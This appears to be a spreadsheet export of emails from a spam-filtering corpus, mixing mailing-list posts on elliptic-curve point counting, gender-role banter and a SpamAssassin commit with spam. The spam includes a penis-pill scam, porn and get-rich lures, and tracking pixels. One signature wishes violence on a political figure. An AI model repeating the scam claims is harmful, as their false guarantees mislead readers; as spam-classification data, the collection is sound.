         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOH0anFG9TmIKJ15BRdR" &gt;Advertise&lt;/a&gt;&lt;br&gt;
         &lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /### subscription management ### --&gt;
 &lt;table width=612 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=588 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=612 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDuxSnE5e5vnMUN5xspoRR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notnCeghJIiSupcptbPMPR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYOoGlYfQffN5r5ls4rR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUw-0pAxOElq9S_p8qkEiiR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHn7qdEjyFPcZsjpRp-LrR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XguhbAetASOnO8CtmMgRR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=65-K82zIDPtIz9cRGtD70VOf0m8P9ZR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjUl8m1k-hU6coezkBZXdR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKwfUYCjwXvsg9tyQFWveR" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=612 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;table width=100% border=0 cellspacing=2 cellpadding=1&gt; &lt;tr valign=bottom&gt; &lt;td width=75% height=31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=31 valign=top&gt; &lt;div align=right&gt; &lt;img src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e501-01&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt; 
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a5-DytH-gZ_S_fyQb1hzM8i1II7s9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Elliptic Curve Point Counting, made easy
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley writes:
 &gt; Here are some numbers with the new algorithm for counting points on
 &gt; elliptic curves (over fields of characteristic 2).
 &gt; 
 &gt; In 1998, Reynald Lercier set a record at 1663 bits in 330 days of CPU
 &gt; on 266 MHz Alphas.  In 1999, Frederik Vercauteren set a record at 1999
 &gt; bits in 65 days of CPU on 400 MHz PCs.
 &gt; 
 &gt; I've been working on the problem since then.  These were measured just
 &gt; now on Rajit's 750 MHz Alpha:
 &gt; 
 &gt;   1009 bits:
 &gt;     Lift:  4.8 s + 0.64 s precomputation.
 &gt;     Norm:  2.6 s + 0.31 s precomputation.
 &gt; 
 &gt;   1663 bits:
 &gt;     Lift: 18.5 s + 2.1 s precomputation.
 &gt;     Norm:  7.0 s + 1.9 s precomputation.
 &gt; 
 &gt;   1999 bits:
 &gt;     Lift: 29.4 s + 3.6 s precomputation.
 &gt;     Norm: 16.6 s + 3.4 s precomputation.
 &gt; 
 &gt;   15013 bits:
 &gt;     Lift: 1 h 39 m + 13 m precomputation
 &gt;     Norm: 39 m + 1 h 41 m precomputation
 Not knowing one whit about elliptic curve math, can you provide 
 some expert interpretation of these results?
 It looks like the old record for, say, 199 bits, has been
 blown out of the water by a factor of ~100,000.
 Does this mean that Eliptic Curve encryption is
 now easily breakable? Or faster than before with
 no loss in strength? Or stronger?
 Raw bits are OK, cooked bits are better.
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">quitcherbraggin.
 :-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 Sent: Friday, September 06, 2002 3:42 AM
 To: bitbitch@magnesium.net
 Cc: Adam L. Beberg; fork@spamassassin.taint.org
 Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 I dunno, BB.  Women who like to be thought of this way should have the
 right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 of hours I do, sometimes more, if he has to catch up with me.  (:  I
 close him because he is industrious and creative, and because he
 unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 here soon to help boy #1 with other things such as pedicures,  backrubs,
 and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 have his cake and eat it too, if he can only find the right girl who has
 the same beliefs about gender  roles that he has. Of course, he has NO
 clue where to look, so we will be constantly laughing at him while he
 stumbles around in the dark.
 Cindy
 P.S. the numbers do not in any way indicate importance or favor -- only
 the order in which they move into my house.  -smiles at chris-
 P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 like it normally does.  Wish me luck.  I'm going to look for another
 computer job.  Le Sigh.  (:
 On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Hello Adam,
 &gt;
 &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt;
 &gt;
 &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt;
 &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; so often...  (anyone else want to do the honors?)
 &gt;
 &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 then
 &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 she and
 &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 &gt;
 &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; find -love- (which is the crucial distinction between this system) and
 &gt; they marry one another for the satisfaction of being together.   I
 &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; motivator for marrying her, we would not be having this conversation
 &gt; now.
 &gt;
 &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; situations are great, provided everyone is aware that the relationship
 &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; marriage.
 &gt;
 &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; blame law school and my cat.
 &gt;
 &gt; -BB
 &gt;
 &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; ALB&gt;   beberg@mithral.com
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 --
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We are on the look-out for new partners such as you and your company
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----=b1z9tz8hennlu9udi_dkzpz49njtph
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 We are on the look-out for new partners such as you and your company
 Whether you want to buy or sell, BlueCom Danmark A/S is worth closer acquaintance
 BlueCom Danmark A/S is a worldwide IT-distributor of PC-systems and add-ons. Since its foundation in 1992 the company has enjoyed constant growth, and is always on the look out for new partners to cooperate with. 
 We have found you and your company through our Internet research, and hope to establish a fruitful cooperation with you in the future. However, we apologies if you are not the correct person to contact within your company, and kindly request that you forward this message to that person. Further, if this letter is of no interest to you and your company, please press the unsubscribe button in this mail.
 The easiest way to start cooperating with BlueCom Danmark A/S is through our user-friendly website. 
 If any of the features detailed below are of interest to your company, please click on the link and our cooperation has already begun. 
 CUSTOMER:
 Would you like the best prices on the market, plus 24-hour delivery and an incredible 30 days credit?
 Then maybe you would like to become our partner or customer. 
 We are able to offer the absolute best prices on the market because of our large-scale procurement of a small number of specific products. Our range includes products from IBM, Compaq and HP Options such as Notebooks, PCs and Monitors. We also offer PC parts such as RAM, CPUs, VGA cards, Motherboards, Wireless products, original Mobile Phones and accessories, Hard disks, DVD, CD-RW, TFT screens, from the following top companies: ASUS, ECS, ABIT, CREATIVE, INTEL, AMD, U.S. ROBOTICS, LG, PLEXTOR, BELKIN, BENQ, SAMSUNG, IBM SOFTWARE and many more. 
 Besides delivering at the very best prices, we offer Real-Time updated prices through our Customer Lounge, 24-hour delivery all over Europe and 30 days credit.
 Please click here: http://ocms.ocms.dk/engine/redirectord.cfm?ID=1214
 SUPPLIER:
 Are you a future supplier to BlueCom Danmark A/S?
 BlueCom Danmark A/S keeps it suppliers updated on products in demand, the specific volumes on request, and of course the target prices. If you would like to see which products and target prices we are interested in right now, please click here: http://ocms.ocms.dk/engine/redirectord.cfm?ID=1213
 EVERYBODY:
 Would you like to receive IT News?
 BlueCom Danmark A/S offers IT News for free.  We produce a newsletter with articles covering the changes in our industry, new products, tariff rates and general trends in the IT-market. The newsletter also contains information about BlueCom Danmark A/S and the development of its business partners. 
 Please click here: http://ocms.ocms.dk/engine/redirectord.cfm?ID=1212
 Would you like more information about BlueCom Danmark A/S? 
 For further information please do not hesitate to contact BlueCom Danmark A/S. You can also visit our homepage at: http://ocms.ocms.dk/engine/redirectord.cfm?ID=1211
 Thanks for your time. We look forward to hearing from you.
 Best regards
 Jens Fournais,
 Managing Director
 BlueCom Danmark A/S
 To unsubscribe from this mailing list, please click here: http://ocms.ocms.dk/engine/redirect.cfm?ID=1210
 -----=b1z9tz8hennlu9udi_dkzpz49njtph
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Partner Mail&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"+2"&gt;We are on the look-out 
   for new partners such as you and your company&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
   &lt;i&gt;&lt;br&gt;
   Whether you want to buy or sell, BlueCom Danmark A/S is worth closer acquaintance&lt;/i&gt;&lt;br&gt;
   &lt;br&gt;
   BlueCom Danmark A/S is a worldwide IT-distributor of PC-systems and add-ons. 
   Since it's foundation in 1992 the company has enjoyed constant growth, and is 
   always on the look out for new partners to cooperate with. &lt;br&gt;
   &lt;br&gt;
   We have found you and your company through our Internet research, and hope to 
   establish a fruitful cooperation with you in the future. However, we apologies 
   if you are not the correct person to contact within your company, and kindly 
   request that you forward this message to that person. Further, if this letter 
   is of no interest to you and your company, please press the "unsubscribe" button 
   in this mail. &lt;br&gt;
   &lt;br&gt;
   The easiest way to start cooperating with BlueCom Danmark A/S is through our 
   user-friendly website. If any of the features detailed below are of interest 
   to your company, please click on the link and our cooperation has already begun.&lt;br&gt;
   &lt;br&gt;
   &lt;b&gt;CUSTOMER: &lt;/b&gt;&lt;br&gt;
   &lt;b&gt;Would you like the best prices on the market, plus 24-hour delivery and an 
   incredible 30 days credit? &lt;/b&gt;&lt;br&gt;
   Then maybe you would like to become our partner or customer.&lt;br&gt;
   We are able to offer the absolute best prices on the market because of our large-scale 
   procurement of a small number of specific products. Our range includes products 
   from IBM, Compaq and HP Options such as Notebooks, PCs and Monitors. We also 
   offer PC parts such as RAM, CPUs, VGA cards, Motherboards, Wireless products, 
   original Mobile Phones and accessories, Hard disks, DVD, CD-RW, TFT screens, 
   from the following top companies: ASUS, ECS, ABIT, CREATIVE, INTEL, AMD, U.S. 
   ROBOTICS, LG, PLEXTOR, BELKIN, BENQ, SAMSUNG, IBM SOFTWARE and many more. &lt;br&gt;
   &lt;br&gt;
   Besides delivering at the very best prices, we offer Real-Time updated prices 
   through our Customer Lounge, 24-hour delivery all over Europe and 30 days credit. 
   &lt;br&gt;
   Please click here: &lt;a href=3D"http://ocms.ocms.dk/engine/redirect.cfm?ID=3D1214"&gt;Customers 
   Lounge&lt;/a&gt; &lt;br&gt;
   &lt;br&gt;
   &lt;b&gt;SUPPLIER: &lt;/b&gt;&lt;br&gt;
   &lt;b&gt;Are you a future supplier to BlueCom Danmark A/S? &lt;/b&gt;&lt;br&gt;
   BlueCom Danmark A/S keeps it suppliers updated on products in demand, the specific 
   volumes on request, and of course the target prices. If you would like to see 
   which products and target prices we are interested in right now, &lt;br&gt;
   please click here: &lt;a href=3D"http://ocms.ocms.dk/engine/redirect.cfm?ID=3D1213"&gt;Suppliers 
   Lounge&lt;/a&gt; &lt;br&gt;
   &lt;b&gt; &lt;/b&gt;&lt;br&gt;
   &lt;b&gt;EVERYBODY:&lt;/b&gt; &lt;br&gt;
   &lt;b&gt;Would you like to receive IT News?&lt;br&gt;
   &lt;/b&gt; BlueCom Danmark A/S offers IT News for free. We produce a newsletter with 
   articles covering the changes in our industry, new products, tariff rates and 
   general trends in the IT-market. The newsletter also contains information about 
   BlueCom Danmark A/S and the development of its business partners. &lt;br&gt;
   Please click here: &lt;a href=3D"http://ocms.ocms.dk/engine/redirect.cfm?ID=3D1212"&gt;IT-News&lt;/a&gt; 
   &lt;br&gt;
   &lt;br&gt;
   &lt;b&gt;Would you like more information about BlueCom Danmark A/S? &lt;/b&gt;&lt;br&gt;
   For further information please do not hesitate to contact BlueCom Danmark A/S. 
   &lt;br&gt;
   You can also visit our homepage at: &lt;a href=3D"http://ocms.ocms.dk/engine/redirect.cfm?ID=3D1211"&gt;www.bluecom.com&lt;/a&gt; 
   &lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   Thanks for your time. We look forward to hearing from you. &lt;br&gt;
   &lt;br&gt;
   Best regards &lt;br&gt;
   &lt;br&gt;
   Jens Fournais&lt;br&gt;
   Managing Director &lt;br&gt;
   &lt;br&gt;
   BlueCom Danmark A/S &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;To unsubscribe from this mailing 
   list, please click here: &lt;a href=3D"http://ocms.ocms.dk/engine/redirect.cfm?ID=3D1210"&gt;UNSUBSCRIBE&lt;/a&gt;&lt;br&gt;
   (You are subscribed with this e-mail address: fork@spamassassin.taint.org )&lt;br&gt;
   &lt;br&gt;
   &lt;/font&gt;&lt;/p&gt;
 &lt;img src=3D"http://bluecom.mail2l.com/postingread/postingread.cfm?C=3D7B0F29BE-8C5C-4843-9C6F21B476889157&amp;P=3D2437&amp;E=3Dfork%40xent%2Ecom&amp;EID=3D1280992&amp;EXT=3D0&amp;KEY=3DF486EB96B87DECC97BF80D15E2CFB8E3" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/body&gt;
 &lt;/html&gt;
 -----=b1z9tz8hennlu9udi_dkzpz49njtph--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.1,1.91.2.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
 In directory usw-pr-cvs1:/tmp/cvs-serv13785
 Modified Files:
       Tag: b2_4_0
 	Conf.pm 
 Log Message:
 restricted version_tag
 Index: Conf.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
 retrieving revision 1.91.2.1
 retrieving revision 1.91.2.2
 diff -b -w -u -d -r1.91.2.1 -r1.91.2.2
 --- Conf.pm	21 Aug 2002 16:02:13 -0000	1.91.2.1
 +++ Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2
 @@ -263,6 +263,7 @@
      if(/^version[-_]tag\s+(.*)$/) {
        my $tag = lc($1);
 +      $tag =~ tr/a-z0-9./_/c;
        foreach (@Mail::SpamAssassin::EXTRA_VERSION) {
          if($_ eq $tag) {
            $tag = undef;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">I found the following mentioned on a news.gnome.org usenet posting. 
 I've not yet tried it thou.  AFAIK this is just the gnome2 rpms, but
 there ximian's, don't know what else is on the apt repository either,
 must take a look around.
 Mark
 # Gnome2 - mentioned on news.gnome.org
 rpm http://apt.sunnmore.net/ gnome2 gnome2
 rpm-src http://apt.sunnmore.net/ gnome2 gnome2
 On Sun, 2002-07-21 at 14:15, Brian Fahrlander wrote:
 &gt; On 20 Jul 2002 17:17:59 -0500, Chris Weyl &lt;cweyl@mindspring.com&gt; wrote:
 &gt; 
 &gt; &gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
 &gt; &gt; repository?
 &gt; &gt; 
 &gt; &gt; (I know, I know....  but some ppl kinda like it:-))
 &gt; 
 &gt;     Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.
 &gt; 
 &gt;     If you find/setup one (and figure out how to install it) let me know.
 &gt; 
 &gt; ------------------------------------------------------------------------
 &gt; Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 &gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
 &gt; ICQ  5119262
 &gt; ------------------------------------------------------------------------
 &gt; I don't want to hear news from Isreal until the news contains the words
 &gt; "Bullet", "Brain", and "Arafat".
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Er
</t>
  </si>
  <si>
    <t xml:space="preserve">use this address instead, please.
 prerogatively,
 geege
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Turn it off! It not only risks silent false
 &gt; positives, but suffers them in such a way that
 &gt; individuals cannot adjust/detect/remedy them.
 Better yet, start another list; fork-spam and forward the suspect items to it.
 Much like the noarchive list.  This wouldn't be perfect but it'd be better than
 nothing at all.
 &gt; Usually I figure if I miss a FoRK post,
 &gt; no big deal, I'll pick it up by the replies if it's interesting.
 +1
 -Bill Kearney
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: IWT Bans RIAA From Accessing Its Network
</t>
  </si>
  <si>
    <t xml:space="preserve">Beautiful, let the information wars begin... I can't wait to see how 
 this evolves... Perhaps the RIAA will seek legislation preventing others 
 from preventing their access to other networks? I can't see how that 
 would work out though... Yes, very interesting, and quite sad at the 
 same time.
 Elias
 R. A. Hettinga wrote:
 &gt;http://www.informationwave.net/news/20020819riaa.php ...
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Say "Goodbye" to the 9-5 yhe
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" color="#FF0000"&gt;Fire Your Boss...&lt;/font&gt;&lt;/b&gt;&lt;font size="5"&gt;&lt;br&gt;
 &lt;/font&gt;Say &amp;quot;Goodbye&amp;quot; to the 9-5!&lt;/p&gt;
 &lt;font FACE="Times New Roman" SIZE="3"&gt;
 &lt;p align="center"&gt;Tired of working to make someone else wealthy?&lt;/p&gt;
 &lt;p align="center"&gt;FREE tape teaches you how to make YOU wealthy!&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a href="mailto:reachme@btamail.net.cn?subject=free-tape"&gt;Click here and 
 send your name and mailing address for a free copy&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="Times New Roman" size="2"&gt;
 &lt;p align="center"&gt;&lt;a href="mailto:removals@btamail.net.cn"&gt;To unsubscribe click 
 here&lt;/a&gt;&lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt; 
 xgcqyahtsvdwhqnhjiuweimhfumiaiyawr
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: NORTON SYSTEMWORKS 2002 BLOWOUT!                 QHZHC
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WWW Form Submission
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (jamie@msn.com) on Tuesday, August 27, 2002 at 22:26:56
 ---------------------------------------------------------------------------
 :: &lt;A HREF="http://www.pornhere.net"&gt;click here&lt;/A&gt;Don't want to pay for Porn? Would you like to get it for FREE? The Honest, No Risk 100% Free Way? If you take a couple of minutes and read through our simple guide you will be able to get Free Passes to the top Paysites online!&lt;A HREF="http://www.pornhere.net"&gt;click here&lt;/A&gt;
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Flexible' retirement gains ground
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8724000,215/
 Date: 2002-10-10T03:26:51+01:00
 *Money:* Government admits millions may have to work on beyond 65.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How many "inches" do you need to satisfy a woman in bed?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;67% of women desire a &amp;quot;bigger&amp;quot; man...&lt;br&gt;
 &gt;&gt;From the Creator of Longitude comes SizeMAX-&lt;br&gt;
 The most powerful penis enlargement pill on the market!&lt;br&gt;
 &lt;br&gt;
 GO BIG... SATISFY HER BETTER THAN ANY MAN CAN!!!&lt;br&gt;
 OVER 120,000,000 CAPSULES SOLD!!!&lt;br&gt;
 &lt;br&gt;
 . Do you want a larger and firmer penis?&lt;br&gt;
 . Do you want to give your partner more pleasure?&lt;br&gt;
 . Do you want to stay ROCK HARD longer? &lt;br&gt;
 &lt;br&gt;
 Our Revolutionary Pill Can Enlarge Your Penis&lt;br&gt;
 Up to 3-FULL-INCHES. 100% GUARANTEED! &lt;br&gt;
 &lt;br&gt;
 Believe it or not, it is now possible.&lt;br&gt;
 Check out dramatic before and after photos and what JANE Magazine had to&lt;br&gt;
 say about the breakthrough SizeMAX formula...&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://218.5.77.248/www418/"&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;for no further emails &lt;a href="http://218.5.77.248/www418/takemeoff.html"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Why should I?  (:
 C
 On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; quitcherbraggin.
 &gt; 
 &gt; :-)
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: Adam L. Beberg; fork@spamassassin.taint.org
 &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; close him because he is industrious and creative, and because he
 &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; stumbles around in the dark.
 &gt; Cindy
 &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; the order in which they move into my house.  -smiles at chris-
 &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; computer job.  Le Sigh.  (:
 &gt; 
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; 
 &gt; &gt; Hello Adam,
 &gt; &gt;
 &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt;
 &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt;
 &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; then
